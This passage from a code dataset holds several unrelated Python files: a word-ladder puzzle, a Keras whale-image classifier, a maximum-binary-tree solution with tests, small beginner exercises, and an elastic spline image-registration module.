A legal move at the current word is to change ONE letter to get\n a new word, where the new word must be a valid English word.\n\nThe sequence of words from the start to the target is called\na \"word ladder,\" hence the name of the puzzle.\n\nExample:\n Start word: 'make'\n Target word: 'cure'\n Solution:\n make\n bake\n bare\n care\n cure\n\n Note that there are many possible solutions, and in fact a shorter one\n exists for the above puzzle. Do you see it?\n\nImplementation details:\n- We have provided some starter code in the constructor which reads in a list\n of valid English words from wordsEn.txt. You should use this list to\n determine what moves are valid.\n- **WARNING**: unlike Sudoku, Word Ladder has the possibility of getting\n into infinite recursion if you aren't careful. The puzzle state\n should keep track not just of the current word, but all words\n in the ladder. This way, in the 'extensions' method you can just\n return the possible new words which haven't already been used.\n\"\"\"\nfrom puzzle import Puzzle\n\n\nCHARS = 'abcdefghijklmnopqrstuvwxyz'\n\n\nclass WordLadderPuzzle(Puzzle):\n \"\"\"A word ladder puzzle.\"\"\"\n\n # === Private attributes ===\n # @type _words: list[str]\n # List of allowed English words\n # @type _start: str\n # The start word\n # @type _target: str\n # The target word\n # @type _states: list[str]\n # List of words that have been tried.\n\n def __init__(self, start, target, states=None, words=None):\n \"\"\"Create a new word ladder puzzle with given start and target words.\n\n @type self: WordLadderPuzzle\n @type start: str\n @type target: str\n @type states: list[str] | None\n @type words: list[str] | None\n @rtype: None\n \"\"\"\n # Code to initialize _words - you don't need to change this.\n if words is None:\n self._words = []\n with open('wordsEnTest.txt') as wordfile:\n for line in wordfile:\n self._words.append(line.strip())\n self._words = set(self._words)\n else:\n self._words = words\n\n self._start = start\n self._target = target\n self._states = []\n if states is not None:\n self._states.extend(states)\n\n def __str__(self):\n \"\"\"Return a human-readable string representation of this puzzle.\n\n @type self: WordLadderPuzzle\n @rtype: str\n\n >>> w = WordLadderPuzzle('make', 'cure')\n >>> w._states = ['make', 'cake', 'care']\n >>> w._start = 'cure'\n >>> print(w)\n make -> cake -> care -> cure\n \"\"\"\n string = \" -> \".join(self._states + [self._start])\n if not self.is_solved():\n string += \" -> ??? 
-> \" + self._target\n return string\n\n def is_solved(self):\n \"\"\"Return whether this puzzle is in a solved state.\n\n A word ladder puzzle is solved when the target word is reached.\n\n @type self: WordLadderPuzzle\n @rtype: bool\n \"\"\"\n return self._start == self._target\n\n def extensions(self):\n \"\"\"Return a list of possible new states after a valid move.\n\n The valid move must change exactly one character of the\n current word, and must result in an English word stored in\n self._words.\n\n The returned moves should be sorted in alphabetical order\n of the produced word.\n\n @type self: WordLadderPuzzle\n @rtype: list[WordLadderPuzzle]\n \"\"\"\n lst = []\n\n # Change each character in the start word and if the resulting word is\n # in the dictionary (not in the history), add it to the list.\n chars = list(self._start)\n for i in range(len(chars)):\n origin = chars[i]\n for k in CHARS:\n if k != origin:\n chars[i] = k\n word = \"\".join(chars)\n if word not in lst and word not in self._states \\\n and word in self._words:\n lst.append(word)\n chars[i] = origin\n\n # Now construct the extensions with the word in the list.\n extentions = []\n states = self._states + [self._start]\n for word in sorted(lst):\n extentions.append(WordLadderPuzzle(word, self._target, states,\n self._words))\n return extentions\n\n def move(self, move):\n \"\"\"Return a new puzzle state specified by making the given move.\n\n Raise a ValueError if represents an invalid move.\n\n @type self: WordLadderPuzzle\n @type move: str\n @rtype: WordLadderPuzzle\n \"\"\"\n # Check if the word in the move is valid\n possibles = [state._start for state in self.extensions()]\n if move in possibles:\n return WordLadderPuzzle(move, self._target, self._states +\n [self._start])\n else:\n raise ValueError\n\n def from_puzzles_to_move(self, puzzle1, puzzle2):\n \"\"\"An helper function for *hint_by_depth* in the solver.py module.\n\n puzzle1 is the current puzzle state and puzzle2 is a puzzle state after\n a valid move. 
Return the move that leads from puzzle1 to puzzle2.\n\n @type self: WordLadderPuzzle\n @type puzzle1: WordLadderPuzzle\n @type puzzle2: WordLadderPuzzle\n @rtype: str\n \"\"\"\n words = str(puzzle2).split(' -> ')\n return words[words.index('???') - 1]\n","sub_path":"A2/word_ladder_puzzle.py","file_name":"word_ladder_puzzle.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"193923221","text":"# Standard neutral network\n\n# Import some libraries\nimport numpy as np\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.utils import to_categorical\nimport matplotlib .pyplot as plt\nimport pandas as pd\nimport cv2\nimport os\nfrom tqdm import tqdm\n\n\n\n\n# Get the data values from the csv\ndf = pd.read_csv(\"train.csv\")\n\n\n\n\n# Convert the pandas datafram to a numpy array\nnparry = df.to_numpy()\n# There are 25361 images and corresponding labels(thus an array of 25361 by 2)\n\n\n\n\n# Seperate the whale image IDs and the labels(y) into two seperate arrays\nwhale_image_IDs = nparry[:,0]\nlabels = nparry[:,1]\n\n\n\n\n# Declare which folder has the training images\nDATADIR = \"./humpback-whale-identification\"\ncategory = \"train\"\npath = os.path.join(DATADIR, category)\n\n\n\nX_grey_100x100 = np.empty((25361, 100, 100))\n\n\n# This dataset will be black and white, and of size 100x100\nindex = 0\nfor img in tqdm(os.listdir(path)):\n img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_GRAYSCALE)\n new_array = cv2.resize(img_array, (100, 100))\n row_vec = new_array[np.newaxis, :]\n X_grey_100x100[index] = row_vec\n #plt.imshow(new_array)\n #plt.show()\n index += 1\nprint(X_grey_100x100[0].shape)\nprint(X_grey_100x100.shape)\nnp.save('X_grey_100x100', X_grey_100x100)\n\n\n\n\n# We need to create a one-hot encoded data model\ny, uniques = pd.factorize(labels)\nprint(y) #[0, 1, 2, 3, 3, 3, 4 ...]\nprint(uniques) #All unique labels\n\n\n\n\nprint(X_grey_100x100.shape) #(25361, 100, 100)\nprint(labels.shape) #(25361)\n\n\n\n\n# We will flatten the image\nX_grey_100x100 = X_grey_100x100.reshape((-1, 10000))\n\n\n\n\n# We will normlize the image as this helps apparently\nX_grey_100x100 = (X_grey_100x100 / 255) - 0.5\n\n\n\n\n# We will have two dense layers and one output layer\nmodel = Sequential([\n Dense(512, activation='relu', input_shape=(10000,)),\n Dense(512, activation='relu'),\n\n Dense(5005, activation='softmax'),\n])\n\n\n\n\n# The model will use adam as the optimizer, categorical_cross entropy loss\nmodel.compile(\n optimizer='adam',\n loss='categorical_crossentropy',\n metrics=['accuracy'],\n)\n\n\n\n\n\nhist = model.fit(\n X_grey_100x100, # training data\n to_categorical(y), # training targets\n epochs=5,\n batch_size=256,\n validation_split=0.3\n)\n\n\n\n\n\n# Save the model\nmodel.save_weights('model6.h5')\n\n\n\n\n#Visualize the models accuracy\nplt.plot(hist.history['accuracy'])\nplt.plot(hist.history['val_accuracy'])\nplt.title('Model Accuracy')\nplt.ylabel('Accuracy')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Val'], loc='upper left')\nplt.show()\n\n\n\n\n#Visualize the models loss\nplt.plot(hist.history['loss'])\nplt.plot(hist.history['val_loss'])\nplt.title('Model Loss')\nplt.ylabel('Loss')\nplt.xlabel('Epoch')\nplt.legend(['Train', 'Val'], loc='upper right')\nplt.show()\n\n\n\n\nX_grey_100x100_test = np.empty((7960, 100, 100))\n\nDATADIR_test = \"./humpback-whale-identification\"\ncategory_test = \"test\"\npath = os.path.join(DATADIR_test, 
category_test)\n\n# This dataset will be black and white, and of size 100x100\nindex = 0\nwhale_ids = []\nfor img in tqdm(os.listdir(path)):\n whale_ids.append(img)\n img_array = cv2.imread(os.path.join(path,img), cv2.IMREAD_GRAYSCALE)\n new_array = cv2.resize(img_array, (100, 100))\n row_vec = new_array[np.newaxis, :]\n X_grey_100x100_test[index] = row_vec\n #plt.imshow(new_array)\n #plt.show()\n index += 1\nprint(X_grey_100x100_test[0].shape)\nprint(X_grey_100x100_test.shape)\n\n\n\n\n#Flatten and normalize the data\nX_grey_100x100_test = X_grey_100x100_test.reshape((-1, 10000))\nX_grey_100x100_test = (X_grey_100x100_test / 255) - 0.5\n\n\n\n# We will store our guesses in a pandas data frame for now\ndf = pd.DataFrame(columns=['Image', 'Id'])\n# Declare which folder has the testing images\n\n#y_hat = np.empty((, 5005))\n\nindex = 0\nfor img in tqdm(X_grey_100x100_test):\n probabilities = model.predict(np.array([img]))\n #print(probabilities)\n target_index = np.where(probabilities[0] == np.amax(probabilities[0]))\n \n #Get the correct id for that index\n y_guess = uniques[target_index[0][0]]\n img_code = whale_ids[index] \n df.loc[index] = img_code, y_guess\n index +=1\n\n\n\n\n#Save the csv\ndf.to_csv('eighth_try.csv', index=False)\n\n\n\n\n\n\n","sub_path":"neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":4184,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"488310199","text":"#!/usr/bin/env python\n# https://leetcode.cn/problems/maximum-binary-tree/\nfrom __future__ import annotations\n\nimport unittest\nfrom typing import Optional, List\n\n\nclass TreeNode:\n @staticmethod\n def construct_maximum_binary_tree(nums: List[int]) -> Optional[TreeNode]:\n if 0 == len(nums):\n return None\n\n node = TreeNode(nums[0])\n for num in nums:\n node = node.mbt_add(num)\n\n return node\n\n def __init__(self, val=0, left: Optional[TreeNode] = None, right: Optional[TreeNode] = None, weight=1):\n self.weight = weight\n self.val = val\n self.left = left\n self.right = right\n\n # 构建出根就是最大值的二叉树,可以由此展开联想,在构建二叉树的同时,做一些额外操作,得到有特定问题针对性的二叉树。\n def mbt_add(self, val: int) -> TreeNode:\n if val == self.val:\n self.weight += 1\n return self\n\n if val > self.val:\n new_node = TreeNode(val)\n new_node.left = self\n return new_node\n\n self.right = TreeNode(val) if self.right is None else self.right.mbt_add(val)\n\n return self\n\n def bst_add(self, val: int) -> None:\n node = self\n\n while True:\n if val < node.val:\n if node.left is None:\n node.left = TreeNode(val)\n break\n else:\n node = node.left\n elif node.val < val:\n if node.right is None:\n node.right = TreeNode(val)\n break\n else:\n node = node.right\n else:\n node.weight += 1\n break\n\n def max_value(self) -> int:\n candidates = [self.val]\n\n if self.left is not None:\n candidates.append(self.left.max_value())\n\n if self.right is not None:\n candidates.append(self.right.max_value())\n\n return max(candidates)\n\n def min_value(self) -> int:\n candidates = [self.val]\n\n if self.left is not None:\n candidates.append(self.left.min_value())\n\n if self.right is not None:\n candidates.append(self.right.min_value())\n\n return min(candidates)\n\n def is_valid_bst(self) -> bool:\n if self.left is None and self.right is None:\n return True\n elif self.left is None:\n return self.right.is_valid_bst() and self.val < self.right.min_value()\n elif self.right is None:\n return self.left.is_valid_bst() and self.left.max_value() < self.val\n else:\n return 
self.left.is_valid_bst() and self.right.is_valid_bst() and self.left.max_value() < self.val < self.right.min_value()\n\n def level_order_traversal_for_value(self) -> List[int]:\n nums = []\n nodes = [self]\n\n while True:\n try:\n node = nodes.pop()\n\n if node is None:\n nums.append(None)\n continue\n\n nums.append(node.val)\n nodes.insert(0, node.left)\n nodes.insert(0, node.right)\n except IndexError:\n break\n finally:\n if all([n is None for n in nodes]):\n break\n\n return nums\n\n def preorder_traversal_for_value(self) -> List[Optional[int]]:\n if self.left is None and self.right is None:\n return [self.val]\n\n left_list = [None] if self.left is None else self.left.preorder_traversal_for_value()\n right_list = [None] if self.right is None else self.right.preorder_traversal_for_value()\n\n return [self.val] + left_list + right_list\n\n def inorder_traversal(self) -> List[TreeNode]:\n operator_expand = 1\n operator_eval = 2\n\n operators = [operator_expand]\n nodes = [self]\n result = []\n\n while True:\n try:\n node = nodes.pop()\n operator = operators.pop()\n except IndexError:\n break\n\n if operator == operator_expand:\n if node.right is not None:\n nodes.append(node.right)\n operators.append(operator_expand)\n\n nodes.append(node)\n operators.append(operator_eval)\n\n if node.left is not None:\n nodes.append(node.left)\n operators.append(operator_expand)\n elif operator == operator_eval:\n result.append(node)\n\n return result\n\n\nclass TestTreeNode(unittest.TestCase):\n def test_basic(self):\n tree = TreeNode.construct_maximum_binary_tree([3, 2, 1, 6, 0, 5])\n nums = tree.level_order_traversal_for_value()\n\n self.assertEqual(tree.val, 6)\n self.assertEqual(tree.left.val, 3)\n self.assertEqual(tree.right.val, 5)\n self.assertEqual(nums, [6, 3, 5, None, 2, 0, None, None, 1])\n\n def test_minimum(self):\n tree = TreeNode.construct_maximum_binary_tree([3, 2, 1])\n nums = tree.level_order_traversal_for_value()\n\n self.assertEqual(tree.val, 3)\n self.assertTrue(tree.left is None)\n self.assertEqual(tree.right.val, 2)\n self.assertEqual(nums, [3, None, 2, None, 1])\n\n def test_single(self):\n tree = TreeNode.construct_maximum_binary_tree([7])\n nums = tree.level_order_traversal_for_value()\n\n self.assertEqual(tree.val, 7)\n self.assertTrue(tree.left is None)\n self.assertTrue(tree.right is None)\n self.assertEqual(nums, [7])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"python/leetcode/maximum_binary_tree.py","file_name":"maximum_binary_tree.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"361425008","text":"#Here is a list of faculty teaching this MOOC. Can you write a function and apply it using map() to get a list of all faculty titles and last names (e.g. ['Dr. Brooks', 'Dr. Collins-Thompson', …]) ?\n\npeople = ['Dr. Christopher Brooks', 'Dr. Kevyn Collins-Thompson', 'Dr. VG Vinod Vydiswaran', 'Dr. 
Daniel Romero']\n\n#def split_title_and_name(person):\n# return #Your answer here\n#\n#list(map(#Your answer here))\n\ndef split_title_and_name(person):\n x = person.split(\" \")\n # keep the title (first token) and the last name (last token),\n # so names with middle names are also handled correctly\n return x[0] + \" \" + x[-1]\n\nlist(map(split_title_and_name, people))","sub_path":"week1-python-fundamentals/advanced-python-objects-map.py","file_name":"advanced-python-objects-map.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"464268329","text":"# study of how to use the mod operator in python\r\n\r\nnum1 = float(input(\"Enter a value: \")) # float() converts the input data to a float value.\r\nnum2 = float(input(\"Enter another value: \"))\r\n\r\ndivisao = num1 // num2 # floor division ignores the decimal places, so only the integer part is kept.\r\n\r\nresto = num1 % num2\r\n\r\nprint(num1, \" divided by \", num2, \" equals \", divisao, \" with remainder \", resto)","sub_path":"Mod/Mod.py","file_name":"Mod.py","file_ext":"py","file_size_in_byte":376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"394256682","text":"def linear_search(the_value,target):\r\n n = len(the_value)\r\n for i in range(n):\r\n if the_value[i] == target:\r\n return True\r\n return False\r\n\r\n\r\nli = [1,2,3,4,5,6,7]\r\ntar = int(input(\"Enter target number: \"))\r\nprint(linear_search(li,tar))","sub_path":"liner_search.py","file_name":"liner_search.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
+{"seq_id":"108589212","text":"from skimage.filters import gaussian\nfrom skimage.io import imsave\nfrom spline_registration.utils import coordenades_originals, visualitza_malla, color_a_grisos, ampliacio_malla\nimport numpy as np\nimport random\nfrom scipy.optimize import least_squares\nfrom spline_registration.losses import SSD, info_mutua\nfrom skimage import feature\nfrom PIL import Image\n\n\nclass BaseTransform:\n def __init__(self, mida_malla, dim_imatge):\n self.dim_imatge = dim_imatge\n self.nx = mida_malla[:, 0]\n self.ny = mida_malla[:, 1]\n self.perturbacio = None\n self.diff_step = None\n self.chi = None\n self.gamma = None\n\n def imatge_gaussian(self, imatge, multichanel=True):\n sigma = (imatge.shape[0] / 3 + imatge.shape[1] / 3) * 1 / 5\n imatge_gaussian = gaussian(imatge, sigma=sigma, multichannel=multichanel)\n return imatge_gaussian\n\n def parametres_a_malla(self, parametres, i):\n files = self.nx[i] + 1\n columnes = self.ny[i] + 1\n malla_x = parametres[0: files * columnes].reshape(files, columnes)\n malla_y = parametres[files*columnes: 2*files*columnes].reshape(files, columnes)\n return malla_x, malla_y\n\n def malla_inicial(self, i):\n nx = self.nx[i]\n ny = self.ny[i]\n delta = [int(self.dim_imatge[0] / nx) + 1, int(self.dim_imatge[1] / ny) + 1]\n\n '''\n el +1 ens permet assegurar que la darrera fila/columna de la malla estan defora de la imatge.\n Ja que així creant aquests punts ficticis a fora podem interpolar totes les posicions de la imatge. 
\n Ara la malla serà (nx+1)*(ny+1).\n '''\n malla = np.mgrid[0: (nx + 1) * delta[0]: delta[0], 0: (ny + 1) * delta[1]: delta[1]]\n malla_x = malla[0] # inicialitzam a on van les coordenades x a la imatge_reference\n malla_y = malla[1] # inicialitzam a on van les coordenades y a la imatge_reference\n malla_vector = np.concatenate((malla_x.ravel(), malla_y.ravel()), axis=0)\n\n return malla_vector\n\n def perturbar_malla_aleatoriament(self, malla_vector, imatge_input, iteracions, i):\n\n malla_x, malla_y = self.parametres_a_malla(malla_vector, i)\n Coord_originals_x, Coord_originals_y = coordenades_originals(imatge_input)\n\n nx = self.nx[i]\n ny = self.ny[i]\n delta = [int(self.dim_imatge[0] / nx) + 1, int(self.dim_imatge[1] / ny) + 1]\n perturbacio = self.perturbacio\n\n epsilon1 = np.zeros(malla_x.shape)\n epsilon2 = np.zeros(malla_y.shape)\n if iteracions > 0:\n for i in range(0, malla_x.shape[0]):\n for j in range(0, malla_x.shape[1]):\n epsilon1[i, j] = random.randrange(-int(delta[0] * perturbacio), int(delta[0] * perturbacio))\n for i in range(0, malla_y.shape[0]):\n for j in range(0, malla_y.shape[1]):\n epsilon2[i, j] = random.randrange(-int(delta[1] * perturbacio), int(delta[1] * perturbacio))\n\n malla_x = malla_x + epsilon1\n malla_y = malla_y + epsilon2\n return malla_x, malla_y, Coord_originals_x, Coord_originals_y\n\n def posicio(self, x, y, malla_x, malla_y, i):\n # s val 0 quan la x està a coordenadesx\n # t val 0 quan la y està a coordenadesy\n # i index de la posició més pròxima per davall de la coordenada x a la malla\n # j index de la posició més pròxima per davall de la coordenada y a la malla\n\n nx = self.nx[i]\n ny = self.ny[i]\n delta = [int(self.dim_imatge[0] / nx) + 1, int(self.dim_imatge[1] / ny) + 1]\n\n s, i = np.modf(x / delta[0]) # i part entera del nombre x / delta[0]; s la seva part decimal\n t, j = np.modf(y / delta[1])\n i = np.minimum(np.maximum(i.astype('int'), 0), nx)\n j = np.minimum(np.maximum(j.astype('int'), 0), ny)\n\n interpolacio = np.array([(s - 1) * (t - 1) * malla_x[i, j] + s * (1 - t) * malla_x[i + 1, j]\n + (1 - s) * t * malla_x[i, j + 1] + s * t * malla_x[i + 1, j + 1],\n (s - 1) * (t - 1) * malla_y[i, j] + s * (1 - t) * malla_y[i + 1, j]\n + (1 - s) * t * malla_y[i, j + 1] + s * t * malla_y[i + 1, j + 1]\n ])\n\n return interpolacio\n\n def imatge_transformada(self, imatge_input, coord_desti):\n '''\n Introduim la imatge_input i les coordenades a les quals es mouen les originals després d'aplicar l'interpolació.\n El que volem es tornar la imatge registrada que tengui a les coordenades indicades els colors originals:\n\n Per fer-ho definesc una imatge registrada (inicialment tota negre) i a les coordenades del destí\n anar enviant els colors originals.\n '''\n\n coord_desti = np.round(coord_desti).astype('int') # Discretitzar\n coord_desti = np.maximum(coord_desti, 0)\n coord_desti[0] = np.minimum(coord_desti[0], imatge_input.shape[0] - 1)\n coord_desti[1] = np.minimum(coord_desti[1], imatge_input.shape[1] - 1)\n\n Coord_originals_x, Coord_originals_y = coordenades_originals(imatge_input)\n\n registered_image = np.zeros_like(imatge_input)\n registered_image[Coord_originals_x, Coord_originals_y] = imatge_input[coord_desti[0], coord_desti[1]]\n return registered_image\n\n def transformar(self, imatge, parametres, i):\n\n malla_x, malla_y = self.parametres_a_malla(parametres, i)\n Coord_originals_x, Coord_originals_y = coordenades_originals(imatge)\n\n Coordenades_desti = self.posicio(Coord_originals_x, Coord_originals_y, malla_x, malla_y, 
i)\n\n return self.imatge_transformada(imatge, Coordenades_desti)\n\n def montecarlo(self, malla_vector, imatge_input, imatge_reference, path_carpeta_experiment, fitxer_sortida,\n nombre_execucions, i):\n mx = self.nx[i] + 1\n my = self.ny[i] + 1\n diff_step = self.diff_step\n gamma = self.gamma\n chi = self.chi\n\n valors_optims = 20\n parametres_optims = 0\n\n for num_exec in range(1, nombre_execucions):\n\n malla_x, malla_y, Coord_originals_x, Coord_originals_y = self.perturbar_malla_aleatoriament(\n malla_vector, imatge_input, num_exec, i)\n\n funcio_min_residus = lambda x: self.residus(x, imatge_input, imatge_reference, i)\n\n resultat = least_squares(funcio_min_residus, x0=np.concatenate([malla_x.flatten(), malla_y.flatten()]),\n diff_step=diff_step, gtol=1e-12, xtol=1e-13, ftol=1e-13,\n method='lm', verbose=2)\n\n parametres = resultat.x\n val_parametres = resultat.cost\n residus = funcio_min_residus(parametres)\n\n residuals_error = residus[0:-3]/(1-gamma-chi)\n sum_residuals = np.sum(residuals_error**2)\n min = np.min(residuals_error)\n max = np.max(residuals_error)\n mean = np.mean(residuals_error)\n sd_malla = residus[-3:-1]/gamma\n contorn = residus[-1]/chi\n\n fitxer_sortida.write(f'''{num_exec}:\n \\n {resultat}\\n\n \\n{gamma,chi}:\n min,max,mean dels residus colors originals,suma:{min,max,mean,sum_residuals},\n regularitzacio malla : {sd_malla},\n contorn : {contorn}\\n\n ''')\n imatge_registrada_input = self.transformar(imatge_input, parametres, i)\n imsave(f'{path_carpeta_experiment}/{num_exec:02d}_imatge_registrada{mx,my}_{val_parametres}.png',\n imatge_registrada_input)\n\n # edges\n edges_registrada = self.edges(imatge_registrada_input)\n imsave(f'{path_carpeta_experiment}/{num_exec:02d}_contorn_registrada_{mx,my}.png', edges_registrada)\n\n if val_parametres < valors_optims:\n valors_optims = val_parametres\n parametres_optims = parametres\n\n return valors_optims, parametres_optims\n\n def guardar_millor_imatge_registrada(self, imatge_input, imatge_reference, malla_vector,\n path_carpeta_experiment, fitxer_sortida, iteracions, i):\n\n millorsresultats = self.montecarlo(malla_vector, imatge_input, imatge_reference,\n path_carpeta_experiment, fitxer_sortida, iteracions, i)\n valors_optims = millorsresultats[0]\n parametres_optims = millorsresultats[1]\n\n mx = self.nx[i] + 1\n my = self.ny[i] + 1\n millor_malla_preliminar = self.parametres_a_malla(parametres_optims, i)\n\n fitxer_sortida.write(f'\\n\\n\\n Els millors paràmetres amb una malla {mx} per {my} són: \\n {parametres_optims}\\n\\n\\n')\n imatge_registrada = self.transformar(imatge_input, parametres_optims, i)\n imsave(f'{path_carpeta_experiment}/imatge_registrada_{mx, my}_{valors_optims}.png',\n imatge_registrada)\n return millor_malla_preliminar\n\n def find_best_transform(self, input_image, reference_image, path_carpeta_experiment, fitxer_sortida, iteracions):\n malla_vector = self.malla_inicial(0)\n\n for i in range(0, 2):\n millor_malla_preliminar = self.guardar_millor_imatge_registrada(input_image, reference_image, malla_vector,\n path_carpeta_experiment, fitxer_sortida,\n iteracions[i], i)\n\n malla_ampliada = ampliacio_malla(millor_malla_preliminar[0], millor_malla_preliminar[1])\n malla_vector = [malla_ampliada[0].ravel(), malla_ampliada[1].ravel()]\n malla_vector = np.asarray(malla_vector).ravel()\n\n millor_malla_preliminar = self.guardar_millor_imatge_registrada(input_image, reference_image, malla_vector,\n path_carpeta_experiment, fitxer_sortida,\n iteracions[2], 2)\n parametres_optims = 
np.asarray([millor_malla_preliminar[0].ravel(), millor_malla_preliminar[1].ravel()])\n\n fitxer_sortida.write(f'\\n\\n\\n Els millors paràmetres amb una malla 9 per 9 són: \\n {parametres_optims}\\n')\n\n return parametres_optims\n\n def apply_transform(self, input_image, parametres):\n imatge_registrada = self.transformar(input_image, parametres, 2)\n return imatge_registrada\n\n def visualize_transform(self,input_image, registered_image, reference_image, parametres, path_carpeta_experiment, error):\n\n imsave(f'{path_carpeta_experiment}/imatge_reference.png', reference_image)\n mx, my = self.nx[-1]+1, self.ny[-1]+1\n malla_original = self.parametres_a_malla(self.malla_inicial(2),2)\n millor_malla = self.parametres_a_malla(parametres, 2)\n\n visualitza_malla(registered_image, malla_original[0], malla_original[1],\n f'malla imatge registrada optima {mx, my}',\n f'{path_carpeta_experiment}/malla {mx, my} sobre imatge registrada.png')\n\n visualitza_malla(input_image, millor_malla[0], millor_malla[1],\n f'malla imatge registrada optima {mx, my}',\n f'{path_carpeta_experiment}/malla {mx, my} sobre la imatge d´entrada .png')\n imsave(f'{path_carpeta_experiment}/imatge_registrada_{mx, my}_{error}.png',\n registered_image)\n im1 = Image.open(f'{path_carpeta_experiment}/imatge_reference.png').convert('L')\n im2 = Image.open(f'{path_carpeta_experiment}/imatge_registrada_{mx, my}_{error}.png').convert('L')\n im = Image.blend(im1, im2, 0.5)\n path_imatge_blend = f'{path_carpeta_experiment}/imatge_blend.png'\n im.save(path_imatge_blend)\n\n\nclass ElasticTransform_SSD(BaseTransform):\n def __init__(self, mida_malla, dim_imatge):\n self.dim_imatge = dim_imatge\n self.nx = mida_malla[:, 0]\n self.ny = mida_malla[:, 1]\n self.diff_step = None\n self.gamma = 0.2\n self.chi = 0.08\n self.perturbacio = 1 / 5\n def edges(self, imatge):\n sigma = (imatge.shape[0] / 10 + imatge.shape[1] / 10) * 1 / 5\n imatge_gaussian = gaussian(imatge, sigma=sigma, multichannel=False)\n edges = feature.canny(imatge_gaussian)\n edges = np.where(edges == True, 1, 0)\n return edges\n\n def residus(self, parametres, imatge_input, imatge_reference, i):\n gamma = self.gamma\n chi = self.chi\n beta = 1 - gamma - chi\n\n # definim les imatges registrada inicial, la registrada amb filtratge gaussià\n # i la referència amb filtratge gaussià\n regist_img = self.transformar(imatge_input, parametres, i)\n # enviam les coord_originals de la imatge input a les coor_desti\n gaus_reg_img = self.imatge_gaussian(regist_img)\n gaus_ref_img = self.imatge_gaussian(imatge_reference)\n\n # calculam el factor de regularització que depen dels edges\n regist_edges = self.edges(regist_img)\n ref_edges = self.edges(imatge_reference)\n sum_regist_edges = np.sum(regist_edges)\n dif_edge = np.abs(regist_edges - ref_edges)\n sum_dif_edge = np.sum(dif_edge)\n residuals_edge = sum_dif_edge / sum_regist_edges\n\n # calculam el factor de regularització que depen dels punts de la malla\n malla_x, malla_y = self.parametres_a_malla(parametres, i)\n\n mx_col_post, my_col_post = malla_x[:, 1:], malla_y[:, 1:]\n mx_fila_post, my_fila_post = malla_x[1:, :], malla_y[1:, :]\n\n d1 = np.sqrt(np.power((mx_col_post - malla_x[:, 0:-1]), 2) + np.power((my_col_post - malla_y[:, 0:-1]), 2))\n d2 = np.sqrt(np.power((mx_fila_post - malla_x[0:-1, :]), 2) + np.power((my_fila_post - malla_y[0:-1, :]), 2))\n sd1 = np.std(d1)\n sd2 = np.std(d2)\n residuals_malla = np.asarray([sd1, sd2])\n\n # calculam els residus obtinguts de comparar pixel a pixel les imatges tant originals com 
gaussianes\n dif_quad = np.power((regist_img - imatge_reference).flatten(), 2)\n dif_quad_gaus = np.power((gaus_reg_img - gaus_ref_img).flatten(), 2)\n\n # return np.concatenate([dif_quad_gaus / sum(dif_quad_gaus), gamma * residuals_malla])\n den = sum(dif_quad + dif_quad_gaus)\n if den == 0:\n den = 1\n\n residuals_dif = np.concatenate([dif_quad,dif_quad_gaus])/den\n\n return np.concatenate([beta * residuals_dif,\n gamma * residuals_malla,\n [chi * residuals_edge ]])\n\n\nclass ElasticTransform_IM (BaseTransform):\n def __init__(self, mida_malla, dim_imatge):\n self.dim_imatge = dim_imatge\n self.nx = mida_malla[:, 0]\n self.ny = mida_malla[:, 1]\n self.diff_step = None\n self.gamma = 0.1\n self.chi = 0.08\n self.perturbacio = 1 / 5\n\n def edges(self, imatge):\n edges = feature.canny(color_a_grisos(imatge))\n edges = np.where(edges == True, 1, 0)\n return edges\n\n def residus(self, parametres, imatge_input, imatge_reference, i):\n gamma = self.gamma\n chi = self.chi\n\n imatge_registrada = self.transformar(imatge_input, parametres, i) # enviam les coord_originals de la imatge input a les coor_desti\n\n edges_registrada = self.edges(imatge_registrada)\n edges_reference = self.edges(imatge_reference)\n sum_edges_registrada = np.sum(edges_registrada)\n sum_edges_reference = np.sum(edges_reference)\n dif_edge = np.abs(edges_registrada-edges_reference)\n\n malla_x, malla_y = self.parametres_a_malla(parametres, i)\n\n mx_col_post, my_col_post = malla_x[:, 1:], malla_y[:, 1:]\n mx_fila_post, my_fila_post = malla_x[1:, :], malla_y[1:, :]\n\n d1 = np.sqrt(np.power((mx_col_post - malla_x[:, 0:-1]), 2) + np.power((my_col_post - malla_y[:, 0:-1]), 2))\n d2 = np.sqrt(np.power((mx_fila_post - malla_x[0:-1, :]), 2) + np.power((my_fila_post - malla_y[0:-1, :]), 2))\n sd1 = np.std(d1)\n sd2 = np.std(d2)\n\n residuals_info_mutua_orig = (np.log(np.exp(1))/np.exp(1) - info_mutua(imatge_reference, imatge_registrada, 5))\n residuals_regularizacio = np.asarray([sd1, sd2])\n residuals_edge = np.sum(dif_edge)/(sum_edges_reference + sum_edges_registrada)\n\n beta = 1 - gamma - chi\n return np.concatenate([beta * 100 * residuals_info_mutua_orig / ((5 ** 3) ** 2),\n gamma * residuals_regularizacio,\n [chi * residuals_edge]])\n\n\n\n\n","sub_path":"spline_registration/transform_models.py","file_name":"transform_models.py","file_ext":"py","file_size_in_byte":16753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"612567440","text":"# Copyright (c) 2014 Evalf\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS 